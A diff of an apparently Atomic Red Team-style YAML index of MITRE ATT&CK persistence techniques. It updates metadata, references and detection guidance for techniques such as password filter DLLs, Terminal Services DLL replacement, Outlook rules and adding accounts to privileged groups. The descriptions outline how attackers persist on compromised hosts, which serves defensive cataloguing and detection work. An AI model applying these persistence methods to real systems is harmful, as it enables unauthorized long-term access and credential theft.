         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -34864,8 +35237,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -34879,7 +35252,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -34905,6 +35278,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -34932,42 +35309,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -34982,13 +35328,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -34996,11 +35347,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -35031,7 +35405,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -35069,13 +35443,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -35101,7 +35473,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -35143,7 +35515,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -35221,11 +35592,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -35305,35 +35675,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -35357,71 +35702,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -35430,24 +35764,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -35539,8 +35905,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -35571,7 +35937,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests:
     - name: Chrome/Chromium (Developer Mode)
@@ -35626,66 +35991,135 @@ persistence:
         name: manual
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -35716,7 +36150,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
